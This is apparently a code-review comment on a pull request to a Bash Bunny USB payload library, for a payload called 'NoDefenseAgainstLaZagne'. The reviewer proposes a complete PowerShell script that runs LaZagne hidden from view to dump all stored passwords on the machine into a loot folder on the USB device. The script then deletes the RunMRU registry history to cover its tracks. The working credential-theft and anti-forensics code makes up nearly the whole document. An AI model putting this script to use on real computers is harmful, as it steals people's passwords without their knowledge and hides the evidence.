payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1

```diff
@@ -0,0 +1,5 @@
+$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber')
```

Comment:
I would add a variable to the top of this for the drive label as not everyone will be using the default label name of `BashBunny` adding a variable at the top of the script will allow a user to easily change this if they are using a different setup. 

```
$drivelable = 'BashBunny'
$dest = ((Get-WmiObject win32_volume -f "label='$drivelable'").Name + 'loot\PasswordGrabber')
$filter = 'password_' + $env:COMPUTERNAME
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f "label='$drivelable'").Name + 'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest + '\' + $filter + '_' + $filecount + '.txt')
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
```